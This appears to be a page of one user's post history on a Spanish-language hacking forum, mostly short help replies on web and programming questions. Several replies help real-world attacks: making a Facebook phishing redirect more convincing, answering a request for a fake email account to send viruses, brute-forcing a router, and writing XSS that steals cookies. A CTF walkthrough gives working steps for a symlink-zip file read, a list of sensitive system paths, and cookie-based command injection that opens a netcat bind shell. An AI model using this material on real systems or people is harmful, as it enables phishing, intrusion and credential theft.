You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginno se puede usar websockets para eso? seria mas rapido y consumiria menos recursos
Con un lenguaje que se ejecute en el servidor lo veo muy difícil, lo único que se me ocurre es que uses JavaScript y Ajax para realizar una petición a una web que sabes está en linea y si no conecta puede ser porque ese usuario perdió la conexión a internet.
Saludos!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#181
Dudas y pedidos generales / Re:¿Cómo detectar error en la conexión de Red en mi página web?
Agosto 09, 2016, 07:26:40 PM #182
Dudas y pedidos generales / Re:Ayuda: Conseguir sesión de meterpreter con un payload PHP fuera de red
Agosto 09, 2016, 07:21:04 PM
Es probable que las funciones que usa esten deshabilitadas en un hosting gratuito. Eso lo podes ver corriendo phpinfo() y buscando disable_functions
Subi un archivo con esto y abrilo en el navegador:
Código: text
Como lo probaste adentro de la red?
Subi un archivo con esto y abrilo en el navegador:
<?PHP phpinfo();Como lo probaste adentro de la red?
#183
Dudas y pedidos generales / Re:Fuerza bruta automática sin descargar diccionario
Julio 25, 2016, 08:26:01 PM
Depende a que le quieras hacer fuerza bruta. Lo logico es que el mismo programa que prueba las claves sea el que las genera
#184
Dudas y pedidos generales / Re:SQL injection tuto completo
Julio 25, 2016, 08:24:05 PM
Deberias aprender un poco de sql
Aca hay un par de links You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
algunos no estan mas, pero podes buscarlos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Aca hay un par de links You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
algunos no estan mas, pero podes buscarlos en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#185
Dudas y pedidos generales / Re:Ayuda: Conseguir sesión de meterpreter con un payload PHP fuera de red
Julio 25, 2016, 08:17:53 PM
Postea el codigo de exploit.php
es probable que use sockets y esten deshabilitados como en muchos hostings gratis
es probable que use sockets y esten deshabilitados como en muchos hostings gratis
#186
Dudas y pedidos generales / Re:Necesito crear una cuenta de Email falsa
Julio 19, 2016, 06:40:27 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginY si usas gmail como todo el mundo?
Que tal.
Quisiera saber si existe algún sitio en el cual uno puede generar una cuenta de mail falsa para enviar adjuntos (virus).
Estuve mirando algunas pero no me funcionaron.
O bien si alguien me puede explicar como mandarlo.
Muchas gracias.
#187
Debates, Reviews y Opiniones / Re:El mejor software / servicio para alojar las imagenes en internet
Julio 19, 2016, 06:37:04 PM
Yo hice mi propia web para subir imagenes You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
A veces uso imgur pero hace tiempo que es demasiado complicado
Tambien esta bueno You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pero es para compartir archivos
A veces uso imgur pero hace tiempo que es demasiado complicado
Tambien esta bueno You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pero es para compartir archivos
#188
Dudas y pedidos generales / Re:Login con captcha python
Julio 19, 2016, 06:34:31 PM
El browser hace tres peticiones:
Un get que te devuelve el html con el <img> apuntando al captcha
Un get al link de la imagen del captcha
Un post a donde apunta el formulario con los datos y el captcha resuelto
Segun donde se genere el contenido del captcha podes tener que hacer las tres requests o capaz alcanza con las ultimas dos
por que le pegas dos veces a lo mismo?
Un get que te devuelve el html con el <img> apuntando al captcha
Un get al link de la imagen del captcha
Un post a donde apunta el formulario con los datos y el captcha resuelto
Segun donde se genere el contenido del captcha podes tener que hacer las tres requests o capaz alcanza con las ultimas dos
por que le pegas dos veces a lo mismo?
#189
Dudas y pedidos generales / Re:Ayuda con un web spider
Julio 19, 2016, 06:30:56 PM
Esos datos se cargan con javascript pegandole a una api
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,avg_rating_recent,num_reviews,promotion_price,image_100x100,visible_instructors&page=1&page_size=3&source_action=view&source_object=course&source_object_id=672600&source_page=clp
Lo que vas a tener que cambiar es el id de curso, que lo sacas del link que pasaste vos:
Para ver este tipo de cosas podes usar live http headers, postman o burp
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,avg_rating_recent,num_reviews,promotion_price,image_100x100,visible_instructors&page=1&page_size=3&source_action=view&source_object=course&source_object_id=672600&source_page=clp
Lo que vas a tener que cambiar es el id de curso, que lo sacas del link que pasaste vos:
Citar
<div class="one-col-landing ud-page "
data-content-group="Landing Page"
data-page-name="landing-page-v41"
data-course-id="672600">
Para ver este tipo de cosas podes usar live http headers, postman o burp
#190
Dudas y pedidos generales / Re:Mejores métodos para ingresar a una pagina web y extraer información de ella
Julio 14, 2016, 09:04:09 PM #191
Dudas y pedidos generales / Re:Duda sobre las redirecciones con Phishing de Facebook
Julio 14, 2016, 08:57:24 PM
La diferencia es que para que salga el mensaje de contraseña incorrecta tenes que mandar parametros por post (no se cuales, fijate).
Para hacer eso en una redireccion tenes que mostrar un formulario con los mismos campos que el de facebook, apuntando a donde apunta el de facebook y dispararlo desde javascript con .submit()
aca tenes un ejemplo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
no hace falta que construyas todo el formulario con javascript como hace ahi, pero fijate como el formulario esta oculto y como manda un post con .submit()
Para hacer eso en una redireccion tenes que mostrar un formulario con los mismos campos que el de facebook, apuntando a donde apunta el de facebook y dispararlo desde javascript con .submit()
aca tenes un ejemplo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
no hace falta que construyas todo el formulario con javascript como hace ahi, pero fijate como el formulario esta oculto y como manda un post con .submit()
#192
Dudas y pedidos generales / Re:Vulnerabilidad PHPESSID
Julio 14, 2016, 08:53:25 PM
phpsessid no es una vulnerabilidad, es un parametro de las urls que usa php para mantener estado entre peticiones http
hablas de esto? You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
es un xss, ahi lo dice. Lee sobre xss, ahi tenes que escribir javascript que haga peticiones como el usuario que abre el link o que robe cookies
hablas de esto? You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
es un xss, ahi lo dice. Lee sobre xss, ahi tenes que escribir javascript que haga peticiones como el usuario que abre el link o que robe cookies
#193
Dudas y pedidos generales / Re:[SOLUCIONADO] Primerizo en Back End - Consulta Laravel
Julio 14, 2016, 08:49:00 PM
No podes usar ningun framework php sin saber php
#194
Dudas y pedidos generales / Re:[Pedido]Web's de descarga.
Junio 29, 2016, 08:09:51 PM #195
Off Topic / Re:Programación
Junio 15, 2016, 10:49:02 PM
Si vos ves que te funciona segui haciendolo, pero yo nunca haria eso, para mi es una forma muy mala de aprender a programar.
No hagas resumenes ni subrayes ni copies lo que lees en otro lado. Lee el texto, entendelo y ponelo en practica. Leiste que es un if? ahora escribi un programa que lo use. Leiste que es un for? metelo en el programa anterior
Una vez que tengas una idea de como se programa, hace un programa que tenga un poco mas de sentido.
Si te olvidas de como se escribe algo podes buscarlo en el libro o en internet, no necesitas memorizarlo. Las cosas importantes las vas a aprender solo por usarlas mucho
Te doy un ejemplo:
Despues vas a tener tus propio proyectos y podes fijarte ahi
En algun momento vas a saber bien que significa io y stream y no va a ser necesario buscar nada
Si no tenes una computadora mucho tiempo programá en papel. Es malisimo, pero es mejor que resumir libros. Despues lo pasas a la computadora y lo probas
Elegi un lenguaje, cualquiera que hayas leido que es bueno para empezar. Despues podes aprender otro, la mayoria de los conocimientos se transfieren, pero esta bueno que puedas probar cosas. Si estudias solo teoria y pseudocodigo te vas a aburrir mucho
Para mi, empezar con un proyecto grande y opensource es lo contrario a lo que tenes que hacer. Arranca con algo chico tuyo y anda aumentando la complejidad a medida que aprendas para que siempre tengas que investigar algo nuevo. Podes bajar un proyecto chico y modificarlo para entender como funciona, pero si pensabas hacer algo como meterte de una a parchear firefox no creo que te vaya bien
No hagas resumenes ni subrayes ni copies lo que lees en otro lado. Lee el texto, entendelo y ponelo en practica. Leiste que es un if? ahora escribi un programa que lo use. Leiste que es un for? metelo en el programa anterior
Una vez que tengas una idea de como se programa, hace un programa que tenga un poco mas de sentido.
Si te olvidas de como se escribe algo podes buscarlo en el libro o en internet, no necesitas memorizarlo. Las cosas importantes las vas a aprender solo por usarlas mucho
Te doy un ejemplo:
Citar#include<iostream> -> biblioteca de entrada y salida de datosEn lugar de aprender eso de memoria lo googleas cuando lo necesitas, que es casi nunca You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login#
Despues vas a tener tus propio proyectos y podes fijarte ahi
En algun momento vas a saber bien que significa io y stream y no va a ser necesario buscar nada
Si no tenes una computadora mucho tiempo programá en papel. Es malisimo, pero es mejor que resumir libros. Despues lo pasas a la computadora y lo probas
Elegi un lenguaje, cualquiera que hayas leido que es bueno para empezar. Despues podes aprender otro, la mayoria de los conocimientos se transfieren, pero esta bueno que puedas probar cosas. Si estudias solo teoria y pseudocodigo te vas a aburrir mucho
Para mi, empezar con un proyecto grande y opensource es lo contrario a lo que tenes que hacer. Arranca con algo chico tuyo y anda aumentando la complejidad a medida que aprendas para que siempre tengas que investigar algo nuevo. Podes bajar un proyecto chico y modificarlo para entender como funciona, pero si pensabas hacer algo como meterte de una a parchear firefox no creo que te vaya bien
#196
Dudas y pedidos generales / Re:Diferencias entre ARP spoofing y MAC spoofing
Mayo 11, 2016, 07:48:47 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginno necesariamente, podes ponerte una mac cualquiera
el tema de MAC spoofing que dice que podes suplantar la mac de otra pc de tu red
yo la cambio para que el modem me de otra ip, pero no elijo la de otro equipo
#197
Dudas y pedidos generales / Re:Hola!! ¿Que versión de linux es mejor para hacking?
Mayo 10, 2016, 10:40:01 PM
kali esta bien, trae un monton de cosas instaladas que sirven
igualmente, cualquier distro muy usada te sirve, solo tenes que instalar los paquetes que necesites
igualmente, cualquier distro muy usada te sirve, solo tenes que instalar los paquetes que necesites
#198
Dudas y pedidos generales / Re:Entrar a un Router sin tener usuario y password
Mayo 10, 2016, 01:39:41 PM
Ademas podes hacerle fuerza bruta, muchas veces las clave es mala
Escaneale todos los puertos, capaz tiene mas servicios corriendo:
nmap -p- -O -sV -vv -Pn ip
Fijate que router es y busca si hay algun exploit
Tenes routerpwn y otra cosa parecida, ademas de todos los lugares de siempre que tienen exploits para todo
Tambien podes buscar otra solucion, como armar una vpn o conectarte con ssh desde tu maquina en la lan de la grabadora hacia la maquina que tenes afuera. Asi podes usar el ssh de proxy
Escaneale todos los puertos, capaz tiene mas servicios corriendo:
nmap -p- -O -sV -vv -Pn ip
Fijate que router es y busca si hay algun exploit
Tenes routerpwn y otra cosa parecida, ademas de todos los lugares de siempre que tienen exploits para todo
Tambien podes buscar otra solucion, como armar una vpn o conectarte con ssh desde tu maquina en la lan de la grabadora hacia la maquina que tenes afuera. Asi podes usar el ssh de proxy
#199
Wargames y retos / Re:Mini Reto explotación web [Fácil]
Mayo 09, 2016, 09:07:20 PM
Yo no resolvi la primer parte, lei el post que explicaba como leer archivos y jugue a conseguir ejecucion de codigo
Primero me hice un script para tratar de conseguir mas información. El objetivo era conseguir archivos de configuracion, principalmente para sacar el path del php que maneja las subidas. Mi idea era por un lado, leer el codigo para ver como funcionaba, y por el otro ver si se podia hacer que los archivos descompriman en la carpeta de la web y subir una shell.
Código: text
El txt es este:
Código: text
Despues:
Código: text
Ahi me aparecio el archivo de configuracion de apache y saque que la carpeta es /var/www
Ya me habia imaginado que era esa la carpeta, pero buscaba el archivo en /var/www/index.php
Volvi a correr el script con otro txt:
Código: text
Ahi vi algunos archivos mas y me di cuenta de que era un ubuntu. Tambien me di cuenta de que no habia ninguna configuracion loca, el archivo php.ini estaba como cualquier otro, habian pocos usuarios, el usuario del webserver era www-data y cosas asi. Pregunté y me dijeron que en ubuntu tenia que buscar en /var/www/html/index.php
Ahi consegui el source:
Código: text
Código: text
Ahi me di cuenta de algo que podria haber visto mucho antes: cuando tiraba errores tipo "cat: /tmp/asdasdasdasdqwe: No such file or directory", el nombre del archivo venia del id de sesion (la cookie PHPSESSID)
La parte importante:Código: text
Con exec() tambien se ejecutan los comandos, pero con passthru() vemos la salida
Seteo la cookie a esto:
Código: text
Trate de correr nc y wget pero no podia porque si ponia un espacio en la cookie, php generaba otra
Use esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me quedó esta cookie:Código: text
Y ahi me pude conectar a una shell remota
A partir de la parte donde consigo el codigo php, todas las pruebas son locales porque desaparecio el servidor. Es probable que en el servidor no me pueda conectar asi, pero sirve la misma tecnica para hacer una conexion inversa o para bajar una webshell con wget
Me diverti bastante, me gustó que no haya que adivinar cosas
Primero me hice un script para tratar de conseguir mas información. El objetivo era conseguir archivos de configuracion, principalmente para sacar el path del php que maneja las subidas. Mi idea era por un lado, leer el codigo para ver como funcionaba, y por el otro ver si se podia hacer que los archivos descompriman en la carpeta de la web y subir una shell.
<?PHP
$a = file_get_contents("httpd-conf-locations.txt");
$i=300;
foreach(explode("\n", $a) as $line){
system('ln -s "'.$line.'" prueba'.$i++);
}
El txt es este:
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/var/www/conf/httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/conf.d/apache2
/opt/lampp/etc/httpd.conf
Despues:
zip --symlinks prueba1.zip prueba*
Ahi me aparecio el archivo de configuracion de apache y saque que la carpeta es /var/www
Ya me habia imaginado que era esa la carpeta, pero buscaba el archivo en /var/www/index.php
Volvi a correr el script con otro txt:
/apache/logs/access.log
/apache/logs/error.log
/apache2/logs/access.log
/apache2/logs/error.log
/bin/php.ini
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/cgi-bin
/etc/chrootUsers
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/my.cnf
/etc/mysql/my.cnf
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/shadow
/etc/utmp
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/access.log
/logs/error.log
/logs/pure-ftpd.log
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/root/.Xauthority
/root/.bash_history
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/log
/var/apache/logs
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/access_log
/var/log/access_log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/error.log
/var/log/error_log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/log/access_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/error_log
/web/conf/php.ini
/www/logs/proftpd.system.log
c:\NetServer\bin\stable\apache\php.ini
c:\PHP\php.ini
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\apache\logs\access.log
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\error.log
c:\apache\php\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\php4\php.ini
c:\php5\php.ini
c:\php\php.ini
c:\xampp\apache\bin\php.ini
Ahi vi algunos archivos mas y me di cuenta de que era un ubuntu. Tambien me di cuenta de que no habia ninguna configuracion loca, el archivo php.ini estaba como cualquier otro, habian pocos usuarios, el usuario del webserver era www-data y cosas asi. Pregunté y me dijeron que en ubuntu tenia que buscar en /var/www/html/index.php
Ahi consegui el source:
ln -s "/var/www/html/index.php" prueba54
zip --symlinks prueba1.zip prueba54
<!DOCTYPE html5>
<head>
<meta charset="utf-8"/>
<title>Sube tu archivo aquí</title>
</head>
<body>
<form action="?page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="kuankear!"/>
</form>
<?php
session_start();
$allowed = array('zip');
$filename = $_FILES['file']['name'];
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if (!in_array($ext, $allowed)) {
die("La extensión del archivo no es admisible.");
}
$tmp_file = "/tmp/" . session_id();
$zip = new ZipArchive;
$zip->open($_FILES['file']['name']);
$zip->extractTo($tmp_file);
exec('unzip -o ' . $_FILES['file']['tmp_name'] . ' -d ' . $tmp_file);
echo "Contenido del ZIP:<br>";
passthru("cat $tmp_file/* 2>&1");
exec("rm -rf $tmp_file");
?>
</body>
</html>Ahi me di cuenta de algo que podria haber visto mucho antes: cuando tiraba errores tipo "cat: /tmp/asdasdasdasdqwe: No such file or directory", el nombre del archivo venia del id de sesion (la cookie PHPSESSID)
La parte importante:
session_start();
$tmp_file = "/tmp/" . session_id();
passthru("cat $tmp_file/* 2>&1");Con exec() tambien se ejecutan los comandos, pero con passthru() vemos la salida
Seteo la cookie a esto:
Citar0g4clkinm90tfeukeferus7en0asd$(id)Y entre un monton de errores se ve esto:
Contenido del ZIP:<br>cat: /tmp/0g4clkinm90tfeukeferus7en0asduid=33(http): Is a directory
cat: gid=33(http): No such file or directory
cat: groups=33(http)/*: No such file or directoryTrate de correr nc y wget pero no podia porque si ponia un espacio en la cookie, php generaba otra
Use esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me quedó esta cookie:
qur0v0rjnj840jju8qn1qpdjd3q$({nc,-lp,8989,-e,/bin/bash})Y ahi me pude conectar a una shell remota
A partir de la parte donde consigo el codigo php, todas las pruebas son locales porque desaparecio el servidor. Es probable que en el servidor no me pueda conectar asi, pero sirve la misma tecnica para hacer una conexion inversa o para bajar una webshell con wget
Me diverti bastante, me gustó que no haya que adivinar cosas
#200
Dudas y pedidos generales / Re:Como detectar que codigo CSS y JS se usa en una pagina html y/o PHP en localhost
Mayo 09, 2016, 06:57:55 PM
El servidor no va a andar lento, pero la pagina va a tardar un poco mas en cargar porque hace falta hacer mas peticiones y transferir mas datos
La pregunta es interesante, si encontras la solucion posteala
La pregunta es interesante, si encontras la solucion posteala
